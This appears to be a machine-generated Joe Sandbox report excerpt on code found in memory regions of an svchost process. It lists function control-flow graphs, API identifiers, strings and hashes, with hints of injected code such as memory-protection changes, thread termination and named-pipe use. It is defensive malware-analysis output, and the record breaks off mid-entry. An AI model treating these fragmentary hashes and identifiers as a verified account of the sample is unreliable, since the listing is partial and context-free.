                                                              control_flow_graph 463 26a87999944-26a879999ac call 26a8799a814 466 26a87999e13-26a87999e1b call 26a8799bb48 463->466 467 26a879999b2-26a879999b5 463->467 467->466 468 26a879999bb-26a879999c1 467->468 470 26a879999c7-26a879999cb 468->470 471 26a87999a90-26a87999aa2 468->471 470->471 475 26a879999d1-26a879999dc 470->475 473 26a87999d63-26a87999d67 471->473 474 26a87999aa8-26a87999aac 471->474 478 26a87999d69-26a87999d70 473->478 479 26a87999da0-26a87999daa call 26a87998a34 473->479 474->473 476 26a87999ab2-26a87999abd 474->476 475->471 477 26a879999e2-26a879999e7 475->477 476->473 481 26a87999ac3-26a87999aca 476->481 477->471 482 26a879999ed-26a879999f7 call 26a87998a34 477->482 478->466 483 26a87999d76-26a87999d9b call 26a87999e1c 478->483 479->466 489 26a87999dac-26a87999dcb call 26a87996d40 479->489 485 26a87999c94-26a87999ca0 481->485 486 26a87999ad0-26a87999b07 call 26a87998e10 481->486 482->489 497 26a879999fd-26a87999a28 call 26a87998a34 * 2 call 26a87999124 482->497 483->479 485->479 490 26a87999ca6-26a87999caa 485->490 486->485 501 26a87999b0d-26a87999b15 486->501 494 26a87999cba-26a87999cc2 490->494 495 26a87999cac-26a87999cb8 call 26a879990e4 490->495 494->479 500 26a87999cc8-26a87999cd5 call 26a87998cb4 494->500 495->494 507 26a87999cdb-26a87999ce3 495->507 530 26a87999a48-26a87999a52 call 26a87998a34 497->530 531 26a87999a2a-26a87999a2e 497->531 500->479 500->507 505 26a87999b19-26a87999b4b 501->505 509 26a87999c87-26a87999c8e 505->509 510 26a87999b51-26a87999b5c 505->510 513 26a87999df6-26a87999e12 call 26a87998a34 * 2 call 26a8799baa8 507->513 514 26a87999ce9-26a87999ced 507->514 509->485 509->505 510->509 515 26a87999b62-26a87999b7b 510->515 513->466 516 26a87999cef-26a87999cfe call 26a879990e4 514->516 517 26a87999d00 514->517 518 26a87999c74-26a87999c79 515->518 519 26a87999b81-26a87999bc6 call 26a879990f8 * 2 515->519 527 26a87999d03-26a87999d0d call 26a8799a8ac 516->527 517->527 523 26a87999c84 518->523 544 26a87999c04-26a87999c0a 519->544 545 26a87999bc8-26a87999bee call 26a879990f8 call 26a8799a038 519->545 523->509 527->479 542 26a87999d13-26a87999d61 call 26a87998d44 call 26a87998f50 527->542 530->471 548 26a87999a54-26a87999a74 call 26a87998a34 * 2 call 26a8799a8ac 530->548 531->530 535 26a87999a30-26a87999a3b 531->535 535->530 540 26a87999a3d-26a87999a42 535->540 540->466 540->530 542->479 552 26a87999c7b 544->552 553 26a87999c0c-26a87999c10 544->553 563 26a87999c15-26a87999c72 call 26a87999870 545->563 564 26a87999bf0-26a87999c02 545->564 568 26a87999a76-26a87999a80 call 26a8799a99c 548->568 569 26a87999a8b 548->569 554 26a87999c80 552->554 553->519 554->523 563->554 564->544 564->545 573 26a87999a86-26a87999def call 26a879986ac call 26a8799a3f4 call 26a879988a0 568->573 574 26a87999df0-26a87999df5 call 26a8799baa8 568->574 569->471 573->574 574->513
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: 1f6ce65c737b67c16a74770dcca6a547431568ee9d47403595349a7bcceb887e
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: 97E1D572605B408AFBA0DF65D48839D77B4F7A97A8F100116EE8D67B99DB36C091CF02
                                                              Function 0000026A879CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: e22ce2f0d6908cfb41650f8e3b1f78ec9287b8d585868ecd0f1c06e4ba5b9ad5
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 5D41E633311A0091FE96DB56A80CB5D3BA6F785BE0F5941299D0DAB784EE3AC4458B02
                                                              Function 0000026A879C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 735 26a879c104c-26a879c10b9 RegQueryInfoKeyW 736 26a879c11b5-26a879c11d0 735->736 737 26a879c10bf-26a879c10c9 735->737 737->736 738 26a879c10cf-26a879c111f RegEnumValueW 737->738 739 26a879c11a5-26a879c11af 738->739 740 26a879c1125-26a879c112a 738->740 739->736 739->738 740->739 741 26a879c112c-26a879c1135 740->741 742 26a879c1147-26a879c114c 741->742 743 26a879c1137 741->743 744 26a879c1199-26a879c11a3 742->744 745 26a879c114e-26a879c1193 GetProcessHeap call 26a879d6168 GetProcessHeap HeapFree 742->745 746 26a879c113b-26a879c113f 743->746 744->739 745->744 746->739 747 26a879c1141-26a879c1145 746->747 747->742 747->746
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: f1e6073484f6787d024fb048a9424189236bd7d4ebebf72dc42381622d64dea6
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 76417173214B84C6EBA0CF61E44839E7BA1F389B98F448129EA8917758EF3DC585CB01
                                                              Function 0000026A879CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD087
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: 7de55e3907eeb61d84b2ec02f2a106e95853d66b6f36fb83176ce734d1449b23
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: EC11823170868481FEF8A7395A5E37D715A5BC47F0F644324A839277EAEE6AC5028F02
                                                              Function 0000026A879C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 4ecf39c6d282c13922bf66bcab5b528d166167323d1dc1c22cdb0ae5698a6f63
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CA81D43160064186FFD0AB2AA94D3AD7B90ABC97C0F5C4425EA4877796EB7BC9458F03
                                                              Function 0000026A879C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 95f3983436fef2e635cbbbb6f4cfe75cb904a5ec283e5a170f3328164d622b80
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: FE312731316A00E1EF92DB46A80875C3BA4B7A9BB0F590525DD2E2B390EF3AC145CB02
                                                              Function 0000026A879D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: b5a7c8e5866d3be681c7c72b6341fd08360724eb52cb5406520433ec029d227b
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: A6116D32310B4086E7E0DB56F84831DBEA0F789FE5F444224EA5E97794DF79C8148B41
                                                              Function 0000026A879C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: d5baf2fdec3915ccb6d5ba03a26523055d6eaf36c073b9562141c2a23a4540a2
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 91115B36704B4182EF949B62F50826D7AB0FB8ABC5F440029EE8D27794EF3EC505CB06
                                                              Function 0000026A879C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: d9bcf84c3bd1533dc594d755c904efc893949546bab9f2d4fefad5fd87b2f6ed
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: 23D18776208B8882DBB0DB0AE49835E7BA0F3D8B84F540116EA8D57BA9DF7DC541CF41
                                                              Function 0000026A879C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 8cc78c2e0b9a0818aac4479415df311af9c6568ae4cde8b4077327d37afdd94e
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 2231B032701B5582FA94DF16E54876DBBA4FB85BC0F084020EE4867B55EF36C4A18B42
                                                              Function 0000026A879CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: a51daef424c37a2d87d3f48ae78d9347c480c631925ac01d6e6589b89c5644b5
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: E611B13130468082FEF4A735965E33D36666BC97F0F500324A83667BDAEE6BC4018E02
                                                              Function 0000026A879C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: 9a315eb257f643b679e19e597653428afdd5a9ed67b0f0b7c202793297a7241d
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: CB016931300A4082EB94DB52A84C35DBBA1F789BC0F884035EE4963755DF3EC989CB01
                                                              Function 0000026A879C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 0005ef61f3f4758259884e0c528835bf75180136e8c964115b40faba9de71eb2
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: AE012D75211B4482EFA4DB62E80D31D7BB0BB86B86F444428DE4D27754EF7EC1488F02
                                                              Function 0000026A879C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 92aa7bb9b2b6dfa6ad1a732484a25b6d845d725c4ad4245d6686fe6e64f0842d
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 2D51BD32701640CEEF94DF15E84DB5D3BA6F3A4BA8F518124DA0767788EB76C981CB06
                                                              Function 0000026A879C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 1ab68a51141d201d9d3457faa14e522c8d132673c329719a63e2eaa97f42be49
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 4331DF32200680CAEB94DF12E84CB1D7BA5F3A4BE8F458014EE4727789DB3AC941CF06
                                                              Function 0000026A879C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: f116469fb9c2a0e448e9d2de76ad660752bf9178b15ca800e2592a53e1aade34
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: 93F03C7230464192EBA0CB21F88875D7F60F789BC8F888021DA4957958DA6EC68DCF05
                                                              Function 0000026A879C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 8951257b2819e3fd8c3a1e414e7e6c4bb950c718772d34c177490584403dd16d
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: D7F01C75718B8482FA94CF53B91C11DBE65AB89FD0F089131EE4A67B18DF7DC4458B02
                                                              Function 0000026A879CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: 3b089b17eef97f58e315832727781e6d96eaf58a468135795a3cb71de5b836e2
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 19F06271211A0481EF50CF29E44C35D7F20EB867A5F940219DA6A571E4DF2EC544CB02
                                                              Function 0000026A879C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: e84d3f95ef50d0da7100aa3763a05495aa81dff1962d31d5224108d669eafd74
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: EF02B632219B8486EBA0CB59E49875EB7A1F3D4794F204015EB8E97BA9DF7DC484CF01
                                                              Function 0000026A879C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: 67d3c669d68eaeb62026641d81c2ba8ade1a21c8528e3319f6dd4d7c6ecb65f5
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: EE61EA36519B44C6EBA0DB15E54832EB7A0F3D8784F600115FA8E57BA8DB7EC580CF02
                                                              Function 0000026A879D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 951121f1d836c29066c475965dea384ba1a895c4e71a86b8b5a2b369afc9a8fb
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: FC117036A10A9131FAE4D568E85E36D3D516B783F8F280724AD76376F6CA2AC8414E03
                                                              Function 0000026A879A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: aeaa6a3608324816b59301e751e5f347b5c67f5421315ed83d7c14011e8581c2
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 9711C232A12F1111FEE4152CE85E36DB9D06B58374F48A738AD7E277E6CA2AC8415E02
                                                              Function 0000026A8799F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: eebbbc8525f68246a3b0a6a29bd4a3cb681badd0c78307970aab721f545df6c1
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: 4861D372604640C2FAF9CB68E54C36EBAA2F785784F544425CA1A377A4DB37C885CF43
                                                              Function 0000026A879CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
